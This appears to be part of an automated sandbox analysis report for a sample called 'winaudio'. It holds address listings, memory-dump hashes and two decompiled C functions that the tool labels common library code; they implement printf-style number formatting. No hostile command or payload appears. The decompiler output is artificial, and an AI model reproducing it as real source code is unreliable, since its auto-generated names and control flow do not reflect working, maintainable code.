                        0x002fc02a
                        0x002fc031
                        0x002fc039
                        0x002fc03b
                        0x002fc040
                        0x002fc044
                        0x002fc045
                        0x002fc049
                        0x002fc04b
                        0x002fc053
                        0x002fc057
                        0x002fc061
                        0x002fc077
                        0x002fc07a
                        0x002fc07c
                        0x002fc07e
                        0x002fc081
                        0x002fc081
                        0x002fc083
                        0x002fc084
                        0x002fc084
                        0x002fc088
                        0x002fc088
                        0x002fc088
                        0x002fc08d
                        0x002fc08e
                        0x002fc091
                        0x002fc096
                        0x002fc099
                        0x002fc397
                        0x002fc399
                        0x002fc39e
                        0x00000000
                        0x002fc09f
                        0x002fc09f
                        0x002fc0a1
                        0x002fc0b4
                        0x002fc0b8
                        0x002fc0b9
                        0x002fc0bc
                        0x002fc0c0
                        0x002fc0c4
                        0x002fc0c6
                        0x002fc382
                        0x002fc387
                        0x002fc38c
                        0x002fc396
                        0x00000000
                        0x002fc0d0
                        0x002fc0d0
                        0x002fc0d0
                        0x002fc0d3
                        0x00000000
                        0x00000000
                        0x002fc0d5
                        0x002fc0d8
                        0x002fc2e1
                        0x002fc2e3
                        0x002fc2e8
                        0x002fc31d
                        0x002fc31d
                        0x002fc31f
                        0x002fc321
                        0x002fc326
                        0x002fc329
                        0x002fc329
                        0x002fc32d
                        0x002fc331
                        0x002fc333
                        0x002fc336
                        0x002fc33b
                        0x002fc33b
                        0x002fc33e
                        0x002fc340
                        0x00000000
                        0x002fc342
                        0x002fc343
                        0x002fc350
                        0x002fc355
                        0x002fc35f
                        0x002fc35f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002fc0de
                        0x002fc0de
                        0x002fc0e0
                        0x002fc0e2
                        0x002fc0e6
                        0x002fc0e8
                        0x002fc19a
                        0x002fc19a
                        0x002fc19c
                        0x002fc1df
                        0x002fc1e3
                        0x002fc1e5
                        0x002fc1e7
                        0x002fc277
                        0x002fc280
                        0x002fc280
                        0x002fc282
                        0x002fc287
                        0x002fc28a
                        0x002fc28b
                        0x002fc28b
                        0x00000000
                        0x002fc1ed
                        0x002fc1ee
                        0x002fc1f3
                        0x002fc1f6
                        0x002fc1f6
                        0x002fc202
                        0x002fc20a
                        0x002fc20c
                        0x002fc210
                        0x002fc24d
                        0x002fc24d
                        0x002fc24f
                        0x002fc291
                        0x00000000
                        0x002fc251
                        0x002fc251
                        0x002fc257
                        0x002fc258
                        0x002fc25d
                        0x002fc260
                        0x002fc263
                        0x00000000
                        0x00000000
                        0x002fc269
                        0x002fc26d
                        0x002fc270
                        0x002fc271
                        0x002fc273
                        0x00000000
                        0x002fc275
                        0x002fc295
                        0x002fc295
                        0x002fc299
                        0x002fc29d
                        0x002fc29f
                        0x002fc2c6
                        0x002fc2c6
                        0x00000000
                        0x002fc2a1
                        0x002fc2a4
                        0x002fc2a8
                        0x002fc311
                        0x002fc316
                        0x002fc31b
                        0x00000000
                        0x002fc2aa
                        0x002fc2aa
                        0x002fc2ab
                        0x002fc2ad
                        0x002fc2b0
                        0x002fc2b3
                        0x002fc2b6
                        0x002fc2b9
                        0x002fc2ba
                        0x002fc2ba
                        0x002fc2c0
                        0x002fc2c3
                        0x002fc2c8
                        0x002fc2c8
                        0x002fc2cc
                        0x002fc2d0
                        0x002fc2d2
                        0x002fc364
                        0x002fc366
                        0x002fc369
                        0x002fc36e
                        0x002fc36e
                        0x002fc371
                        0x002fc373
                        0x002fc376
                        0x002fc37b
                        0x002fc37b
                        0x002fc37e
                        0x00000000
                        0x002fc2d8
                        0x002fc2d8
                        0x00000000
                        0x002fc2d8
                        0x002fc2d2
                        0x002fc2a8
                        0x002fc29f
                        0x00000000
                        0x002fc273
                        0x00000000
                        0x002fc251
                        0x002fc212
                        0x002fc212
                        0x002fc21a
                        0x002fc21c
                        0x002fc21f
                        0x002fc224
                        0x002fc224
                        0x002fc235
                        0x002fc239
                        0x002fc23e
                        0x002fc241
                        0x002fc245
                        0x002fc247
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002fc247
                        0x002fc210
                        0x002fc19e
                        0x002fc19e
                        0x002fc1a2
                        0x002fc1a5
                        0x002fc1b0
                        0x002fc1b0
                        0x002fc1b2
                        0x002fc1b5
                        0x002fc1dc
                        0x00000000
                        0x002fc1b7
                        0x002fc1bc
                        0x002fc1c1
                        0x002fc1c4
                        0x002fc1c6
                        0x00000000
                        0x002fc1cc
                        0x00000000
                        0x002fc1cc
                        0x002fc1c6
                        0x002fc1a7
                        0x002fc1a7
                        0x002fc1aa
                        0x002fc300
                        0x002fc305
                        0x002fc30a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002fc1aa
                        0x002fc1a5
                        0x002fc0f0
                        0x002fc0f0
                        0x002fc0f0
                        0x002fc0f3
                        0x002fc0f4
                        0x002fc0f5
                        0x002fc0f9
                        0x002fc0fd
                        0x002fc100
                        0x00000000
                        0x00000000
                        0x002fc106
                        0x002fc109
                        0x00000000
                        0x002fc10f
                        0x002fc10f
                        0x002fc112
                        0x002fc2ef
                        0x002fc2ef
                        0x002fc2f4
                        0x002fc2f9
                        0x00000000
                        0x002fc118
                        0x002fc118
                        0x002fc11b
                        0x00000000
                        0x002fc121
                        0x002fc121
                        0x002fc123
                        0x002fc15e
                        0x002fc161
                        0x002fc166
                        0x002fc169
                        0x002fc16b
                        0x00000000
                        0x002fc171
                        0x002fc176
                        0x002fc17b
                        0x002fc17e
                        0x002fc180
                        0x00000000
                        0x002fc186
                        0x002fc186
                        0x00000000
                        0x002fc186
                        0x002fc180
                        0x002fc125
                        0x002fc125
                        0x002fc12b
                        0x002fc1d8
                        0x002fc18a
                        0x002fc18a
                        0x002fc18e
                        0x002fc190
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002fc131
                        0x002fc131
                        0x002fc139
                        0x002fc13b
                        0x002fc14c
                        0x002fc14e
                        0x002fc153
                        0x002fc156
                        0x002fc158
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002fc13d
                        0x002fc142
                        0x002fc144
                        0x002fc146
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002fc146
                        0x002fc13b
                        0x002fc12b
                        0x002fc123
                        0x002fc11b
                        0x002fc112
                        0x00000000
                        0x002fc109
                        0x002fc196
                        0x00000000
                        0x002fc196
                        0x00000000
                        0x002fc0e8
                        0x002fc0d0
                        0x002fc0a3
                        0x002fc0a3
                        0x002fc0a5
                        0x002fc0aa
                        0x002fc3a0
                        0x002fc3a0
                        0x002fc3a2
                        0x002fc3a4
                        0x002fc3a9
                        0x002fc3ac
                        0x002fc3b5
                        0x002fc3b6
                        0x002fc3c0
                        0x002fc3c0
                        0x002fc0a1
                        0x002fc063
                        0x002fc066
                        0x002fc075
                        0x002fc075
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID: .\crypto\asn1\a_object.c
                        • API String ID: 0-1678179117
                        • Opcode ID: 62a56b95429effab3c161b68f25172f6972b98ad0bd0c9ae55c62dbb6f777f40
                        • Instruction ID: bdef42afa681191fac3520650eba554fff3f2e1672028edfb02910b1e70b7c6a
                        • Opcode Fuzzy Hash: 62a56b95429effab3c161b68f25172f6972b98ad0bd0c9ae55c62dbb6f777f40
                        • Instruction Fuzzy Hash: 4BA18B71A2434E8BD724DE249E81B3BF3D0AF95780F64453DFE8596282E660D8258B92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00382343 Relevance: 1.5, Strings: 1, Instructions: 214COMMONLIBRARYCODECrypto
                        Download Yara Rule
                        C-Code - Quality: 88%
                        			E00382343(intOrPtr* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				intOrPtr* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E00382C6A(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E003817D7(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E00382F8A(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E003817D7(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E00382E3C(_t95, _t119, _t113, _t116, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E003817D7(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E00382A75(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E00382C52(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E0038288B(_t92, _t119, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E00382BBF(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E00382C33(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E00382828(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E003829E5(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}





































                        0x00382348
                        0x0038234b
                        0x0038234f
                        0x00382352
                        0x00382356
                        0x00382359
                        0x003823c7
                        0x003823ca
                        0x00382419
                        0x00382419
                        0x0038241c
                        0x00382389
                        0x0038238b
                        0x00382390
                        0x00382392
                        0x00382437
                        0x0038243b
                        0x00382444
                        0x00382449
                        0x0038244a
                        0x0038244e
                        0x00382450
                        0x00382455
                        0x00382458
                        0x0038245a
                        0x00382483
                        0x00382483
                        0x00382486
                        0x00382489
                        0x00382490
                        0x00382492
                        0x00382495
                        0x00382497
                        0x0038249b
                        0x0038249b
                        0x0038249e
                        0x003824a9
                        0x003824a9
                        0x003824ab
                        0x003824ab
                        0x003824ad
                        0x003824b3
                        0x003824b3
                        0x003824b8
                        0x003824bb
                        0x003824c6
                        0x003824c6
                        0x003824c8
                        0x003824c8
                        0x003824d3
                        0x003824d7
                        0x003824d7
                        0x003824da
                        0x003824e0
                        0x003824e2
                        0x003824e5
                        0x003824f5
                        0x003824fa
                        0x003824fa
                        0x0038250f
                        0x00382514
                        0x00382517
                        0x0038251c
                        0x0038251f
                        0x00382521
                        0x00382523
                        0x00382526
                        0x00382529
                        0x00382536
                        0x0038253b
                        0x0038253b
                        0x00382529
                        0x00382542
                        0x00382547
                        0x0038254a
                        0x0038254f
                        0x00382552
                        0x00382554
                        0x00382561
                        0x00382566
                        0x00382554
                        0x00382569
                        0x0038256c
                        0x00382571
                        0x00382571
                        0x003824bd
                        0x003824c0
                        0x00000000
                        0x00000000
                        0x003824c2
                        0x00000000
                        0x003824c2
                        0x003824af
                        0x003824b1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x003824b1
                        0x003824a0
                        0x003824a3
                        0x00000000
                        0x00000000
                        0x003824a5
                        0x00000000
                        0x003824a5
                        0x00382499
                        0x00382499
                        0x00382499
                        0x00000000
                        0x00382499
                        0x0038248b
                        0x0038248e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0038248e
                        0x0038245e
                        0x00382461
                        0x00382463
                        0x0038246b
                        0x0038246d
                        0x00382477
                        0x00382479
                        0x0038247b
                        0x00000000
                        0x00000000
                        0x0038247d
                        0x00382481
                        0x00382481
                        0x00000000
                        0x00382481
                        0x0038246f
                        0x00000000
                        0x0038246f
                        0x00382465
                        0x00000000
                        0x00382465
                        0x0038243d
                        0x00000000
                        0x0038243d
                        0x00382398
                        0x00382398
                        0x00000000
                        0x00382398
                        0x00382423
                        0x00382423
                        0x00382426
                        0x003823f8
                        0x003823f8
                        0x003823f9
                        0x003823fb
                        0x003823fd
                        0x00000000
                        0x003823fd
                        0x00382428
                        0x0038242b
                        0x00000000
                        0x00000000
                        0x00382431
                        0x003823a0
                        0x003823a0
                        0x00000000
                        0x003823a0
                        0x003823cc
                        0x0038240f
                        0x00000000
                        0x0038240f
                        0x003823ce
                        0x003823d1
                        0x00382404
                        0x00382406
                        0x00000000
                        0x00382406
                        0x003823d3
                        0x003823d6
                        0x003823f4
                        0x003823f4
                        0x003823f4
                        0x003823f4
                        0x00000000
                        0x003823f4
                        0x003823d8
                        0x003823db
                        0x003823ed
                        0x00000000
                        0x003823ed
                        0x003823dd
                        0x003823e0
                        0x00000000
                        0x00000000
                        0x003823e4
                        0x00000000
                        0x003823e4
                        0x0038235b
                        0x00000000
                        0x00000000
                        0x00382361
                        0x00382364
                        0x003823a4
                        0x003823a4
                        0x003823a7
                        0x003823c0
                        0x00000000
                        0x003823c0
                        0x003823a9
                        0x003823a9
                        0x003823ac
                        0x00000000
                        0x00000000
                        0x003823af
                        0x003823b2
                        0x00000000
                        0x00000000
                        0x003823b4
                        0x003823b7
                        0x00000000
                        0x003823b7
                        0x00382366
                        0x0038239f
                        0x00000000
                        0x0038239f
                        0x0038236b
                        0x00000000
                        0x00000000
                        0x00382374
                        0x00000000
                        0x00000000
                        0x00382379
                        0x00000000
                        0x00000000
                        0x0038237e
                        0x00000000
                        0x00000000
                        0x00382387
                        0x00000000
                        0x00000000
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 283d5db8638949d1d5835be89a5af784f1de0b63702c2f1e920d4ff484a56621
                        • Instruction ID: 1e8ffa002bee2ad3b4ada5700fd7375b6b7667545dc303e1d0e793c844426649
                        • Opcode Fuzzy Hash: 283d5db8638949d1d5835be89a5af784f1de0b63702c2f1e920d4ff484a56621
                        • Instruction Fuzzy Hash: F9518974204B0557DF3BB96E8476BBF63D99B53300F1908DAE983CB682C259DE468372
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00382572 Relevance: 1.5, Strings: 1, Instructions: 214COMMONLIBRARYCODECrypto
                        Download Yara Rule
                        C-Code - Quality: 88%
                        			E00382572(intOrPtr* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				intOrPtr* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E00382C6A(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E00381803(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E00383014(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E00381803(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E00382EE3(_t95, _t119, _t113, _t116, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E00381803(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E00382A75(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E00382C52(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E0038288B(_t92, _t119, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E00382BBF(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E00382C33(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E00382828(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E003829E5(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}





































                        0x00382577
                        0x0038257a
                        0x0038257e
                        0x00382581
                        0x00382585
                        0x00382588
                        0x003825f6
                        0x003825f9
                        0x00382648
                        0x00382648
                        0x0038264b
                        0x003825b8
                        0x003825ba
                        0x003825bf
                        0x003825c1
                        0x00382666
                        0x0038266a
                        0x00382673
                        0x00382678
                        0x00382679
                        0x0038267d
                        0x0038267f
                        0x00382684
                        0x00382687
                        0x00382689
                        0x003826b2
                        0x003826b2
                        0x003826b5
                        0x003826b8
                        0x003826bf
                        0x003826c1
                        0x003826c4
                        0x003826c6
                        0x003826ca
                        0x003826ca
                        0x003826cd
                        0x003826d8
                        0x003826d8
                        0x003826da
                        0x003826da
                        0x003826dc
                        0x003826e2
                        0x003826e2
                        0x003826e7
                        0x003826ea
                        0x003826f5
                        0x003826f5
                        0x003826f7
                        0x003826f7
                        0x00382702
                        0x00382706
                        0x00382706
                        0x00382709
                        0x0038270f
                        0x00382711
                        0x00382714
                        0x00382724
                        0x00382729
                        0x00382729
                        0x0038273e
                        0x00382743
                        0x00382746
                        0x0038274b
                        0x0038274e
                        0x00382750
                        0x00382752
                        0x00382755
                        0x00382758
                        0x00382765
                        0x0038276a
                        0x0038276a
                        0x00382758
                        0x00382771
                        0x00382776
                        0x00382779
                        0x0038277e
                        0x00382781
                        0x00382783
                        0x00382790
                        0x00382795
                        0x00382783
                        0x00382798
                        0x0038279b
                        0x003827a0
                        0x003827a0
                        0x003826ec
                        0x003826ef
                        0x00000000
                        0x00000000
                        0x003826f1
                        0x00000000
                        0x003826f1
                        0x003826de
                        0x003826e0
                        0x00000000
                        0x00000000
                        0x00000000
                        0x003826e0
                        0x003826cf
                        0x003826d2
                        0x00000000
                        0x00000000
                        0x003826d4
                        0x00000000
                        0x003826d4
                        0x003826c8
                        0x003826c8
                        0x003826c8
                        0x00000000
                        0x003826c8
                        0x003826ba
                        0x003826bd
                        0x00000000
                        0x00000000
                        0x00000000
                        0x003826bd
                        0x0038268d
                        0x00382690
                        0x00382692
                        0x0038269a
                        0x0038269c
                        0x003826a6
                        0x003826a8
                        0x003826aa
                        0x00000000
                        0x00000000
                        0x003826ac
                        0x003826b0
                        0x003826b0
                        0x00000000
                        0x003826b0
                        0x0038269e
                        0x00000000
                        0x0038269e
                        0x00382694
                        0x00000000
                        0x00382694
                        0x0038266c
                        0x00000000
                        0x0038266c
                        0x003825c7
                        0x003825c7
                        0x00000000
                        0x003825c7
                        0x00382652
                        0x00382652
                        0x00382655
                        0x00382627
                        0x00382627
                        0x00382628
                        0x0038262a
                        0x0038262c
                        0x00000000
                        0x0038262c
                        0x00382657
                        0x0038265a
                        0x00000000
                        0x00000000
                        0x00382660
                        0x003825cf
                        0x003825cf
                        0x00000000
                        0x003825cf
                        0x003825fb
                        0x0038263e
                        0x00000000
                        0x0038263e
                        0x003825fd
                        0x00382600
                        0x00382633
                        0x00382635
                        0x00000000
                        0x00382635
                        0x00382602
                        0x00382605
                        0x00382623
                        0x00382623
                        0x00382623
                        0x00382623
                        0x00000000
                        0x00382623
                        0x00382607
                        0x0038260a
                        0x0038261c
                        0x00000000
